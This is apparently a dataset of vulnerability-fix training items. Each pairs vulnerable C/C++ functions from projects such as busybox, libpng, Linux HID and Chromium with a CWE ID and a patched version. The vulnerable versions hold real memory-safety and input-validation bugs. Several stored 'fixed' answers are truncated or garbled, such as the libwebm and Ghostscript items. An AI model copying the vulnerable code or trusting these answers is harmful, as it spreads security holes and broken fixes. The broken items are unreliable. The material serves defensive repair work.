coefficient larger than 4*DCT_MAX_VALUE"; } } }
174,526
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: static void add_probe(const char *name) { struct module_entry *m; m = get_or_add_modentry(name); if (!(option_mask32 & (OPT_REMOVE | OPT_SHOW_DEPS)) && (m->flags & MODULE_FLAG_LOADED) && strncmp(m->modname, "symbol:", 7) == 0 ) { G.need_symbols = 1; } } Commit Message: CWE ID: CWE-20
static void add_probe(const char *name) { struct module_entry *m; /* * get_or_add_modentry() strips path from name and works * on remaining basename. * This would make "rmmod dir/name" and "modprobe dir/name" * to work like "rmmod name" and "modprobe name", * which is wrong, and can be abused via implicit modprobing: * "ifconfig /usbserial up" tries to modprobe netdev-/usbserial. */ if (strchr(name, '/')) bb_error_msg_and_die("malformed module name '%s'", name); m = get_or_add_modentry(name); if (!(option_mask32 & (OPT_REMOVE | OPT_SHOW_DEPS)) && (m->flags & MODULE_FLAG_LOADED) && strncmp(m->modname, "symbol:", 7) == 0 ) { G.need_symbols = 1; } }
165,398
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: w3m_exit(int i) { #ifdef USE_MIGEMO init_migemo(); /* close pipe to migemo */ #endif stopDownload(); deleteFiles(); #ifdef USE_SSL free_ssl_ctx(); #endif disconnectFTP(); #ifdef USE_NNTP disconnectNews(); #endif #ifdef __MINGW32_VERSION WSACleanup(); #endif exit(i); } Commit Message: Make temporary directory safely when ~/.w3m is unwritable CWE ID: CWE-59
w3m_exit(int i) { #ifdef USE_MIGEMO init_migemo(); /* close pipe to migemo */ #endif stopDownload(); deleteFiles(); #ifdef USE_SSL free_ssl_ctx(); #endif disconnectFTP(); #ifdef USE_NNTP disconnectNews(); #endif #ifdef __MINGW32_VERSION WSACleanup(); #endif #ifdef HAVE_MKDTEMP if (no_rc_dir && tmp_dir != rc_dir) if (rmdir(tmp_dir) != 0) { fprintf(stderr, "Can't remove temporary directory (%s)!\n", tmp_dir); exit(1); } #endif exit(i); }
169,345
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: static void handle_data_packet(struct mt_connection *curconn, struct mt_mactelnet_hdr *pkthdr, int data_len) { struct mt_mactelnet_control_hdr cpkt; struct mt_packet pdata; unsigned char *data = pkthdr->data; unsigned int act_size = 0; int got_user_packet = 0; int got_pass_packet = 0; int got_width_packet = 0; int got_height_packet = 0; int success; /* Parse first control packet */ success = parse_control_packet(data, data_len - MT_HEADER_LEN, &cpkt); while (success) { if (cpkt.cptype == MT_CPTYPE_BEGINAUTH) { int plen,i; if (!curconn->have_pass_salt) { for (i = 0; i < 16; ++i) { curconn->pass_salt[i] = rand() % 256; } curconn->have_pass_salt = 1; memset(curconn->trypassword, 0, sizeof(curconn->trypassword)); } init_packet(&pdata, MT_PTYPE_DATA, pkthdr->dstaddr, pkthdr->srcaddr, pkthdr->seskey, curconn->outcounter); plen = add_control_packet(&pdata, MT_CPTYPE_PASSSALT, (curconn->pass_salt), 16); curconn->outcounter += plen; send_udp(curconn, &pdata); /* Don't change the username after the state is active */ } else if (cpkt.cptype == MT_CPTYPE_USERNAME && curconn->state != STATE_ACTIVE) { memcpy(curconn->username, cpkt.data, act_size = (cpkt.length > MT_MNDP_MAX_STRING_SIZE - 1 ? MT_MNDP_MAX_STRING_SIZE - 1 : cpkt.length)); curconn->username[act_size] = 0; got_user_packet = 1; } else if (cpkt.cptype == MT_CPTYPE_TERM_WIDTH && cpkt.length >= 2) { unsigned short width; memcpy(&width, cpkt.data, 2); curconn->terminal_width = le16toh(width); got_width_packet = 1; } else if (cpkt.cptype == MT_CPTYPE_TERM_HEIGHT && cpkt.length >= 2) { unsigned short height; memcpy(&height, cpkt.data, 2); curconn->terminal_height = le16toh(height); got_height_packet = 1; } else if (cpkt.cptype == MT_CPTYPE_TERM_TYPE) { memcpy(curconn->terminal_type, cpkt.data, act_size = (cpkt.length > 30 - 1 ? 30 - 1 : cpkt.length)); curconn->terminal_type[act_size] = 0; } else if (cpkt.cptype == MT_CPTYPE_PASSWORD) { #if defined(__linux__) && defined(_POSIX_MEMLOCK_RANGE) mlock(curconn->trypassword, 17); #endif memcpy(curconn->trypassword, cpkt.data, 17); got_pass_packet = 1; } else if (cpkt.cptype == MT_CPTYPE_PLAINDATA) { /* relay data from client to shell */ if (curconn->state == STATE_ACTIVE && curconn->ptsfd != -1) { write(curconn->ptsfd, cpkt.data, cpkt.length); } } else { syslog(LOG_WARNING, _("(%d) Unhandeled control packet type: %d"), curconn->seskey, cpkt.cptype); } /* Parse next control packet */ success = parse_control_packet(NULL, 0, &cpkt); } if (got_user_packet && got_pass_packet) { user_login(curconn, pkthdr); } if (curconn->state == STATE_ACTIVE && (got_width_packet || got_height_packet)) { set_terminal_size(curconn->ptsfd, curconn->terminal_width, curconn->terminal_height); } } Commit Message: Merge pull request #20 from eyalitki/master 2nd round security fixes from eyalitki CWE ID: CWE-119
static void handle_data_packet(struct mt_connection *curconn, struct mt_mactelnet_hdr *pkthdr, int data_len) { struct mt_mactelnet_control_hdr cpkt; struct mt_packet pdata; unsigned char *data = pkthdr->data; unsigned int act_size = 0; int got_user_packet = 0; int got_pass_packet = 0; int got_width_packet = 0; int got_height_packet = 0; int success; /* Parse first control packet */ success = parse_control_packet(data, data_len - MT_HEADER_LEN, &cpkt); while (success) { if (cpkt.cptype == MT_CPTYPE_BEGINAUTH) { int plen,i; if (!curconn->have_pass_salt) { for (i = 0; i < 16; ++i) { curconn->pass_salt[i] = rand() % 256; } curconn->have_pass_salt = 1; memset(curconn->trypassword, 0, sizeof(curconn->trypassword)); } init_packet(&pdata, MT_PTYPE_DATA, pkthdr->dstaddr, pkthdr->srcaddr, pkthdr->seskey, curconn->outcounter); plen = add_control_packet(&pdata, MT_CPTYPE_PASSSALT, (curconn->pass_salt), 16); curconn->outcounter += plen; send_udp(curconn, &pdata); /* Don't change the username after the state is active */ } else if (cpkt.cptype == MT_CPTYPE_USERNAME && curconn->state != STATE_ACTIVE) { memcpy(curconn->username, cpkt.data, act_size = (cpkt.length > MT_MNDP_MAX_STRING_SIZE - 1 ? MT_MNDP_MAX_STRING_SIZE - 1 : cpkt.length)); curconn->username[act_size] = 0; got_user_packet = 1; } else if (cpkt.cptype == MT_CPTYPE_TERM_WIDTH && cpkt.length >= 2) { unsigned short width; memcpy(&width, cpkt.data, 2); curconn->terminal_width = le16toh(width); got_width_packet = 1; } else if (cpkt.cptype == MT_CPTYPE_TERM_HEIGHT && cpkt.length >= 2) { unsigned short height; memcpy(&height, cpkt.data, 2); curconn->terminal_height = le16toh(height); got_height_packet = 1; } else if (cpkt.cptype == MT_CPTYPE_TERM_TYPE) { memcpy(curconn->terminal_type, cpkt.data, act_size = (cpkt.length > 30 - 1 ? 30 - 1 : cpkt.length)); curconn->terminal_type[act_size] = 0; } else if (cpkt.cptype == MT_CPTYPE_PASSWORD && cpkt.length == 17) { #if defined(__linux__) && defined(_POSIX_MEMLOCK_RANGE) mlock(curconn->trypassword, 17); #endif memcpy(curconn->trypassword, cpkt.data, 17); got_pass_packet = 1; } else if (cpkt.cptype == MT_CPTYPE_PLAINDATA) { /* relay data from client to shell */ if (curconn->state == STATE_ACTIVE && curconn->ptsfd != -1) { write(curconn->ptsfd, cpkt.data, cpkt.length); } } else { syslog(LOG_WARNING, _("(%d) Unhandeled control packet type: %d, length: %d"), curconn->seskey, cpkt.cptype, cpkt.length); } /* Parse next control packet */ success = parse_control_packet(NULL, 0, &cpkt); } if (got_user_packet && got_pass_packet) { user_login(curconn, pkthdr); } if (curconn->state == STATE_ACTIVE && (got_width_packet || got_height_packet)) { set_terminal_size(curconn->ptsfd, curconn->terminal_width, curconn->terminal_height); } }
166,964
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: const char* SegmentInfo::GetWritingAppAsUTF8() const { return m_pWritingAppAsUTF8; } Commit Message: libwebm: Pull from upstream Rolling mkvparser from upstream. Primarily for fixing a bug on parsing failures with certain Opus WebM files. Upstream commit hash of this pull: 574045edd4ecbeb802ee3f1d214b5510269852ae The diff is so huge because there were some style clean ups upstream. But it was ensured that there were no breaking changes when the style clean ups was done upstream. Change-Id: Ib6e907175484b4b0ae1b55ab39522ea3188ad039 CWE ID: CWE-119
const char* SegmentInfo::GetWritingAppAsUTF8() const
174,383
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: zsetstrokecolorspace(i_ctx_t * i_ctx_p) { int code; zsetstrokecolorspace(i_ctx_t * i_ctx_p) { int code; code = zswapcolors(i_ctx_p); if (code < 0) /* Now, the actual continuation routine */ push_op_estack(setstrokecolorspace_cont); code = zsetcolorspace(i_ctx_p); if (code >= 0) return o_push_estack; return code; } if (code >= 0) return o_push_estack; return code; } Commit Message: CWE ID: CWE-119
zsetstrokecolorspace(i_ctx_t * i_ctx_p) { int code; zsetstrokecolorspace(i_ctx_t * i_ctx_p) { int code; es_ptr iesp = esp; /* preserve exec stack in case of error */ code = zswapcolors(i_ctx_p); if (code < 0) /* Now, the actual continuation routine */ push_op_estack(setstrokecolorspace_cont); code = zsetcolorspace(i_ctx_p); if (code >= 0) return o_push_estack; return code; } if (code >= 0) return o_push_estack; /* Something went wrong, swap back to the non-stroking space and restore the exec stack */ esp = iesp; (void)zswapcolors(i_ctx_p); return code; }
164,700
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: image_transform_png_set_gray_to_rgb_mod(PNG_CONST image_transform *this, image_pixel *that, png_const_structp pp, PNG_CONST transform_display *display) { /* NOTE: we can actually pend the tRNS processing at this point because we * can correctly recognize the original pixel value even though we have * mapped the one gray channel to the three RGB ones, but in fact libpng * doesn't do this, so we don't either. */ if ((that->colour_type & PNG_COLOR_MASK_COLOR) == 0 && that->have_tRNS) image_pixel_add_alpha(that, &display->this); /* Simply expand the bit depth and alter the colour type as required. */ if (that->colour_type == PNG_COLOR_TYPE_GRAY) { /* RGB images have a bit depth at least equal to '8' */ if (that->bit_depth < 8) that->sample_depth = that->bit_depth = 8; /* And just changing the colour type works here because the green and blue * channels are being maintained in lock-step with the red/gray: */ that->colour_type = PNG_COLOR_TYPE_RGB; } else if (that->colour_type == PNG_COLOR_TYPE_GRAY_ALPHA) that->colour_type = PNG_COLOR_TYPE_RGB_ALPHA; this->next->mod(this->next, that, pp, display); } Commit Message: DO NOT MERGE Update libpng to 1.6.20 BUG:23265085 Change-Id: I85199805636d771f3597b691b63bc0bf46084833 (cherry picked from commit bbe98b40cda082024b669fa508931042eed18f82) CWE ID:
image_transform_png_set_gray_to_rgb_mod(PNG_CONST image_transform *this, image_transform_png_set_gray_to_rgb_mod(const image_transform *this, image_pixel *that, png_const_structp pp, const transform_display *display) { /* NOTE: we can actually pend the tRNS processing at this point because we * can correctly recognize the original pixel value even though we have * mapped the one gray channel to the three RGB ones, but in fact libpng * doesn't do this, so we don't either. */ if ((that->colour_type & PNG_COLOR_MASK_COLOR) == 0 && that->have_tRNS) image_pixel_add_alpha(that, &display->this, 0/*!for background*/); /* Simply expand the bit depth and alter the colour type as required. */ if (that->colour_type == PNG_COLOR_TYPE_GRAY) { /* RGB images have a bit depth at least equal to '8' */ if (that->bit_depth < 8) that->sample_depth = that->bit_depth = 8; /* And just changing the colour type works here because the green and blue * channels are being maintained in lock-step with the red/gray: */ that->colour_type = PNG_COLOR_TYPE_RGB; } else if (that->colour_type == PNG_COLOR_TYPE_GRAY_ALPHA) that->colour_type = PNG_COLOR_TYPE_RGB_ALPHA; this->next->mod(this->next, that, pp, display); }
173,636
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: static __u8 *sp_report_fixup(struct hid_device *hdev, __u8 *rdesc, unsigned int *rsize) { if (*rsize >= 107 && rdesc[104] == 0x26 && rdesc[105] == 0x80 && rdesc[106] == 0x03) { hid_info(hdev, "fixing up Sunplus Wireless Desktop report descriptor\n"); rdesc[105] = rdesc[110] = 0x03; rdesc[106] = rdesc[111] = 0x21; } return rdesc; } Commit Message: HID: fix a couple of off-by-ones There are a few very theoretical off-by-one bugs in report descriptor size checking when performing a pre-parsing fixup. Fix those. Cc: stable@vger.kernel.org Reported-by: Ben Hawkes <hawkes@google.com> Reviewed-by: Benjamin Tissoires <benjamin.tissoires@redhat.com> Signed-off-by: Jiri Kosina <jkosina@suse.cz> CWE ID: CWE-119
static __u8 *sp_report_fixup(struct hid_device *hdev, __u8 *rdesc, unsigned int *rsize) { if (*rsize >= 112 && rdesc[104] == 0x26 && rdesc[105] == 0x80 && rdesc[106] == 0x03) { hid_info(hdev, "fixing up Sunplus Wireless Desktop report descriptor\n"); rdesc[105] = rdesc[110] = 0x03; rdesc[106] = rdesc[111] = 0x21; } return rdesc; }
166,375
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: bool DoCanonicalizePathComponent(const CHAR* source, const Component& component, char separator, CanonOutput* output, Component* new_component) { bool success = true; if (component.is_valid()) { if (separator) output->push_back(separator); new_component->begin = output->length(); int end = component.end(); for (int i = component.begin; i < end; i++) { UCHAR uch = static_cast<UCHAR>(source[i]); if (uch < 0x20 || uch >= 0x80) success &= AppendUTF8EscapedChar(source, &i, end, output); else output->push_back(static_cast<char>(uch)); } new_component->len = output->length() - new_component->begin; } else { new_component->reset(); } return success; } Commit Message: [url] Make path URL parsing more lax Parsing the path component of a non-special URL like javascript or data should not fail for invalid URL characters like \uFFFF. See this bit in the spec: https://url.spec.whatwg.org/#cannot-be-a-base-url-path-state Note: some failing WPTs are added which are because url parsing replaces invalid characters (e.g. \uFFFF) with the replacement char \uFFFD, when that isn't in the spec. Bug: 925614 Change-Id: I450495bfdfa68dc70334ebed16a3ecc0d5737e88 Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1551917 Reviewed-by: Mike West <mkwst@chromium.org> Commit-Queue: Charlie Harrison <csharrison@chromium.org> Cr-Commit-Position: refs/heads/master@{#648155} CWE ID: CWE-20
bool DoCanonicalizePathComponent(const CHAR* source, template <typename CHAR, typename UCHAR> void DoCanonicalizePathComponent(const CHAR* source, const Component& component, char separator, CanonOutput* output, Component* new_component) { if (component.is_valid()) { if (separator) output->push_back(separator); new_component->begin = output->length(); int end = component.end(); for (int i = component.begin; i < end; i++) { UCHAR uch = static_cast<UCHAR>(source[i]); if (uch < 0x20 || uch >= 0x80) AppendUTF8EscapedChar(source, &i, end, output); else output->push_back(static_cast<char>(uch)); } new_component->len = output->length() - new_component->begin; } else { new_component->reset(); } }
173,011
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: void FeatureInfo::InitializeFeatures() { std::string extensions_string(gl::GetGLExtensionsFromCurrentContext()); gfx::ExtensionSet extensions(gfx::MakeExtensionSet(extensions_string)); const char* version_str = reinterpret_cast<const char*>(glGetString(GL_VERSION)); const char* renderer_str = reinterpret_cast<const char*>(glGetString(GL_RENDERER)); gl_version_info_.reset( new gl::GLVersionInfo(version_str, renderer_str, extensions)); bool enable_es3 = IsWebGL2OrES3OrHigherContext(); bool has_pixel_buffers = gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile || gfx::HasExtension(extensions, "GL_ARB_pixel_buffer_object") || gfx::HasExtension(extensions, "GL_NV_pixel_buffer_object"); ScopedPixelUnpackBufferOverride scoped_pbo_override(has_pixel_buffers, 0); AddExtensionString("GL_ANGLE_translated_shader_source"); AddExtensionString("GL_CHROMIUM_async_pixel_transfers"); AddExtensionString("GL_CHROMIUM_bind_uniform_location"); AddExtensionString("GL_CHROMIUM_color_space_metadata"); AddExtensionString("GL_CHROMIUM_command_buffer_query"); AddExtensionString("GL_CHROMIUM_command_buffer_latency_query"); AddExtensionString("GL_CHROMIUM_copy_texture"); AddExtensionString("GL_CHROMIUM_deschedule"); AddExtensionString("GL_CHROMIUM_get_error_query"); AddExtensionString("GL_CHROMIUM_lose_context"); AddExtensionString("GL_CHROMIUM_pixel_transfer_buffer_object"); AddExtensionString("GL_CHROMIUM_rate_limit_offscreen_context"); AddExtensionString("GL_CHROMIUM_resize"); AddExtensionString("GL_CHROMIUM_resource_safe"); AddExtensionString("GL_CHROMIUM_strict_attribs"); AddExtensionString("GL_CHROMIUM_texture_mailbox"); AddExtensionString("GL_CHROMIUM_trace_marker"); AddExtensionString("GL_EXT_debug_marker"); AddExtensionString("GL_EXT_unpack_subimage"); AddExtensionString("GL_OES_vertex_array_object"); if (gfx::HasExtension(extensions, "GL_ANGLE_translated_shader_source")) { feature_flags_.angle_translated_shader_source = true; } bool enable_dxt1 = false; bool enable_dxt3 = false; bool enable_dxt5 = false; bool have_s3tc = gfx::HasExtension(extensions, "GL_EXT_texture_compression_s3tc"); bool have_dxt3 = have_s3tc || gfx::HasExtension(extensions, "GL_ANGLE_texture_compression_dxt3"); bool have_dxt5 = have_s3tc || gfx::HasExtension(extensions, "GL_ANGLE_texture_compression_dxt5"); if (gfx::HasExtension(extensions, "GL_EXT_texture_compression_dxt1") || gfx::HasExtension(extensions, "GL_ANGLE_texture_compression_dxt1") || have_s3tc) { enable_dxt1 = true; } if (have_dxt3) { enable_dxt3 = true; } if (have_dxt5) { enable_dxt5 = true; } if (enable_dxt1) { feature_flags_.ext_texture_format_dxt1 = true; AddExtensionString("GL_ANGLE_texture_compression_dxt1"); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGB_S3TC_DXT1_EXT); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGBA_S3TC_DXT1_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGB_S3TC_DXT1_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGBA_S3TC_DXT1_EXT); } if (enable_dxt3) { AddExtensionString("GL_ANGLE_texture_compression_dxt3"); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGBA_S3TC_DXT3_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGBA_S3TC_DXT3_EXT); } if (enable_dxt5) { feature_flags_.ext_texture_format_dxt5 = true; AddExtensionString("GL_ANGLE_texture_compression_dxt5"); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGBA_S3TC_DXT5_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGBA_S3TC_DXT5_EXT); } bool have_astc = gfx::HasExtension(extensions, "GL_KHR_texture_compression_astc_ldr"); if (have_astc) { feature_flags_.ext_texture_format_astc = true; AddExtensionString("GL_KHR_texture_compression_astc_ldr"); GLint astc_format_it = GL_COMPRESSED_RGBA_ASTC_4x4_KHR; GLint astc_format_max = GL_COMPRESSED_RGBA_ASTC_12x12_KHR; for (; astc_format_it <= astc_format_max; astc_format_it++) { validators_.compressed_texture_format.AddValue(astc_format_it); validators_.texture_internal_format_storage.AddValue(astc_format_it); } astc_format_it = GL_COMPRESSED_SRGB8_ALPHA8_ASTC_4x4_KHR; astc_format_max = GL_COMPRESSED_SRGB8_ALPHA8_ASTC_12x12_KHR; for (; astc_format_it <= astc_format_max; astc_format_it++) { validators_.compressed_texture_format.AddValue(astc_format_it); validators_.texture_internal_format_storage.AddValue(astc_format_it); } } bool have_atc = gfx::HasExtension(extensions, "GL_AMD_compressed_ATC_texture") || gfx::HasExtension(extensions, "GL_ATI_texture_compression_atitc"); if (have_atc) { feature_flags_.ext_texture_format_atc = true; AddExtensionString("GL_AMD_compressed_ATC_texture"); validators_.compressed_texture_format.AddValue(GL_ATC_RGB_AMD); validators_.compressed_texture_format.AddValue( GL_ATC_RGBA_INTERPOLATED_ALPHA_AMD); validators_.texture_internal_format_storage.AddValue(GL_ATC_RGB_AMD); validators_.texture_internal_format_storage.AddValue( GL_ATC_RGBA_INTERPOLATED_ALPHA_AMD); } if (gfx::HasExtension(extensions, "GL_EXT_texture_filter_anisotropic")) { AddExtensionString("GL_EXT_texture_filter_anisotropic"); validators_.texture_parameter.AddValue(GL_TEXTURE_MAX_ANISOTROPY_EXT); validators_.g_l_state.AddValue(GL_MAX_TEXTURE_MAX_ANISOTROPY_EXT); } bool enable_depth_texture = false; GLenum depth_texture_format = GL_NONE; if (!workarounds_.disable_depth_texture && (gfx::HasExtension(extensions, "GL_ARB_depth_texture") || gfx::HasExtension(extensions, "GL_OES_depth_texture") || gfx::HasExtension(extensions, "GL_ANGLE_depth_texture") || gl_version_info_->is_desktop_core_profile)) { enable_depth_texture = true; depth_texture_format = GL_DEPTH_COMPONENT; feature_flags_.angle_depth_texture = gfx::HasExtension(extensions, "GL_ANGLE_depth_texture"); } if (enable_depth_texture) { AddExtensionString("GL_CHROMIUM_depth_texture"); AddExtensionString("GL_GOOGLE_depth_texture"); validators_.texture_internal_format.AddValue(GL_DEPTH_COMPONENT); validators_.texture_format.AddValue(GL_DEPTH_COMPONENT); validators_.pixel_type.AddValue(GL_UNSIGNED_SHORT); validators_.pixel_type.AddValue(GL_UNSIGNED_INT); validators_.texture_depth_renderable_internal_format.AddValue( GL_DEPTH_COMPONENT); } GLenum depth_stencil_texture_format = GL_NONE; if (gfx::HasExtension(extensions, "GL_EXT_packed_depth_stencil") || gfx::HasExtension(extensions, "GL_OES_packed_depth_stencil") || gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile) { AddExtensionString("GL_OES_packed_depth_stencil"); feature_flags_.packed_depth24_stencil8 = true; if (enable_depth_texture) { if (gl_version_info_->is_es3) { depth_stencil_texture_format = GL_DEPTH24_STENCIL8; } else { depth_stencil_texture_format = GL_DEPTH_STENCIL; } validators_.texture_internal_format.AddValue(GL_DEPTH_STENCIL); validators_.texture_format.AddValue(GL_DEPTH_STENCIL); validators_.pixel_type.AddValue(GL_UNSIGNED_INT_24_8); validators_.texture_depth_renderable_internal_format.AddValue( GL_DEPTH_STENCIL); validators_.texture_stencil_renderable_internal_format.AddValue( GL_DEPTH_STENCIL); } validators_.render_buffer_format.AddValue(GL_DEPTH24_STENCIL8); if (context_type_ == CONTEXT_TYPE_WEBGL1) { validators_.attachment.AddValue(GL_DEPTH_STENCIL_ATTACHMENT); validators_.attachment_query.AddValue(GL_DEPTH_STENCIL_ATTACHMENT); } } if (gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile || gfx::HasExtension(extensions, "GL_OES_vertex_array_object") || gfx::HasExtension(extensions, "GL_ARB_vertex_array_object") || gfx::HasExtension(extensions, "GL_APPLE_vertex_array_object")) { feature_flags_.native_vertex_array_object = true; } if (workarounds_.use_client_side_arrays_for_stream_buffers) { feature_flags_.native_vertex_array_object = false; } if (gl_version_info_->is_es3 || gfx::HasExtension(extensions, "GL_OES_element_index_uint") || gl::HasDesktopGLFeatures()) { AddExtensionString("GL_OES_element_index_uint"); validators_.index_type.AddValue(GL_UNSIGNED_INT); } bool has_srgb_framebuffer_support = false; if (gl_version_info_->IsAtLeastGL(3, 2) || (gl_version_info_->IsAtLeastGL(2, 0) && (gfx::HasExtension(extensions, "GL_EXT_framebuffer_sRGB") || gfx::HasExtension(extensions, "GL_ARB_framebuffer_sRGB")))) { feature_flags_.desktop_srgb_support = true; has_srgb_framebuffer_support = true; } if ((((gl_version_info_->is_es3 || gfx::HasExtension(extensions, "GL_OES_rgb8_rgba8")) && gfx::HasExtension(extensions, "GL_EXT_sRGB")) || feature_flags_.desktop_srgb_support) && IsWebGL1OrES2Context()) { feature_flags_.ext_srgb = true; AddExtensionString("GL_EXT_sRGB"); validators_.texture_internal_format.AddValue(GL_SRGB_EXT); validators_.texture_internal_format.AddValue(GL_SRGB_ALPHA_EXT); validators_.texture_format.AddValue(GL_SRGB_EXT); validators_.texture_format.AddValue(GL_SRGB_ALPHA_EXT); validators_.render_buffer_format.AddValue(GL_SRGB8_ALPHA8_EXT); validators_.framebuffer_attachment_parameter.AddValue( GL_FRAMEBUFFER_ATTACHMENT_COLOR_ENCODING_EXT); validators_.texture_unsized_internal_format.AddValue(GL_SRGB_EXT); validators_.texture_unsized_internal_format.AddValue(GL_SRGB_ALPHA_EXT); has_srgb_framebuffer_support = true; } if (gl_version_info_->is_es3) has_srgb_framebuffer_support = true; if (has_srgb_framebuffer_support && !IsWebGLContext()) { if (feature_flags_.desktop_srgb_support || gfx::HasExtension(extensions, "GL_EXT_sRGB_write_control")) { feature_flags_.ext_srgb_write_control = true; AddExtensionString("GL_EXT_sRGB_write_control"); validators_.capability.AddValue(GL_FRAMEBUFFER_SRGB_EXT); } } if (gfx::HasExtension(extensions, "GL_EXT_texture_sRGB_decode") && !IsWebGLContext()) { AddExtensionString("GL_EXT_texture_sRGB_decode"); validators_.texture_parameter.AddValue(GL_TEXTURE_SRGB_DECODE_EXT); } bool have_s3tc_srgb = false; if (gl_version_info_->is_es) { have_s3tc_srgb = gfx::HasExtension(extensions, "GL_NV_sRGB_formats") || gfx::HasExtension(extensions, "GL_EXT_texture_compression_s3tc_srgb"); } else { if (gfx::HasExtension(extensions, "GL_EXT_texture_sRGB") || gl_version_info_->IsAtLeastGL(4, 1)) { have_s3tc_srgb = gfx::HasExtension(extensions, "GL_EXT_texture_compression_s3tc"); } } if (have_s3tc_srgb) { AddExtensionString("GL_EXT_texture_compression_s3tc_srgb"); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_SRGB_S3TC_DXT1_EXT); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT1_EXT); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT3_EXT); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT5_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_SRGB_S3TC_DXT1_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT1_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT3_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT5_EXT); } bool has_apple_bgra = gfx::HasExtension(extensions, "GL_APPLE_texture_format_BGRA8888"); bool has_ext_bgra = gfx::HasExtension(extensions, "GL_EXT_texture_format_BGRA8888"); bool enable_texture_format_bgra8888 = has_ext_bgra || has_apple_bgra || !gl_version_info_->is_es; bool has_ext_texture_storage = gfx::HasExtension(extensions, "GL_EXT_texture_storage"); bool has_arb_texture_storage = gfx::HasExtension(extensions, "GL_ARB_texture_storage"); bool has_texture_storage = !workarounds_.disable_texture_storage && (has_ext_texture_storage || has_arb_texture_storage || gl_version_info_->is_es3 || gl_version_info_->IsAtLeastGL(4, 2)); bool enable_texture_storage = has_texture_storage; bool texture_storage_incompatible_with_bgra = gl_version_info_->is_es3 && !has_ext_texture_storage && !has_apple_bgra; if (texture_storage_incompatible_with_bgra && enable_texture_format_bgra8888 && enable_texture_storage) { switch (context_type_) { case CONTEXT_TYPE_OPENGLES2: enable_texture_storage = false; break; case CONTEXT_TYPE_OPENGLES3: enable_texture_format_bgra8888 = false; break; case CONTEXT_TYPE_WEBGL1: case CONTEXT_TYPE_WEBGL2: case CONTEXT_TYPE_WEBGL2_COMPUTE: case CONTEXT_TYPE_WEBGPU: break; } } if (enable_texture_storage) { feature_flags_.ext_texture_storage = true; AddExtensionString("GL_EXT_texture_storage"); validators_.texture_parameter.AddValue(GL_TEXTURE_IMMUTABLE_FORMAT_EXT); } if (enable_texture_format_bgra8888) { feature_flags_.ext_texture_format_bgra8888 = true; AddExtensionString("GL_EXT_texture_format_BGRA8888"); validators_.texture_internal_format.AddValue(GL_BGRA_EXT); validators_.texture_format.AddValue(GL_BGRA_EXT); validators_.texture_unsized_internal_format.AddValue(GL_BGRA_EXT); validators_.texture_internal_format_storage.AddValue(GL_BGRA8_EXT); validators_.texture_sized_color_renderable_internal_format.AddValue( GL_BGRA8_EXT); validators_.texture_sized_texture_filterable_internal_format.AddValue( GL_BGRA8_EXT); feature_flags_.gpu_memory_buffer_formats.Add(gfx::BufferFormat::BGRA_8888); feature_flags_.gpu_memory_buffer_formats.Add(gfx::BufferFormat::BGRX_8888); } bool enable_render_buffer_bgra = gl_version_info_->is_angle || !gl_version_info_->is_es; if (enable_render_buffer_bgra) { feature_flags_.ext_render_buffer_format_bgra8888 = true; AddExtensionString("GL_CHROMIUM_renderbuffer_format_BGRA8888"); validators_.render_buffer_format.AddValue(GL_BGRA8_EXT); } bool enable_read_format_bgra = gfx::HasExtension(extensions, "GL_EXT_read_format_bgra") || !gl_version_info_->is_es; if (enable_read_format_bgra) { feature_flags_.ext_read_format_bgra = true; AddExtensionString("GL_EXT_read_format_bgra"); validators_.read_pixel_format.AddValue(GL_BGRA_EXT); } feature_flags_.arb_es3_compatibility = gfx::HasExtension(extensions, "GL_ARB_ES3_compatibility") && !gl_version_info_->is_es; feature_flags_.ext_disjoint_timer_query = gfx::HasExtension(extensions, "GL_EXT_disjoint_timer_query"); if (feature_flags_.ext_disjoint_timer_query || gfx::HasExtension(extensions, "GL_ARB_timer_query") || gfx::HasExtension(extensions, "GL_EXT_timer_query")) { 